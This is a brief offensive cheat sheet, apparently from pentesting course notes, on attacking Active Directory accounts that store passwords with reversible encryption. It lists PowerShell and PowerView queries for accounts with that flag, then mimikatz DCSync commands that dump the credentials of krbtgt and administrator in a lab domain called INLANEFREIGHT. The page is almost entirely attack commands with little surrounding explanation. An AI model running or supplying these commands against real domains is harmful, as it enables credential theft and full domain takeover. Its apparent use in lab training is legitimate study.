reverse-encryption-password-storage-attack
Check for reversible encryption option
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControlCheck for reversible encryption option
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrolAttack
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" exitReversible encryption password attack (mimikatz)
mimikatz) runas /netonly /user:INLANEFREIGHT\CT059 powershell.\mimikatz.exe "privilege::debug lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator" exitLast updated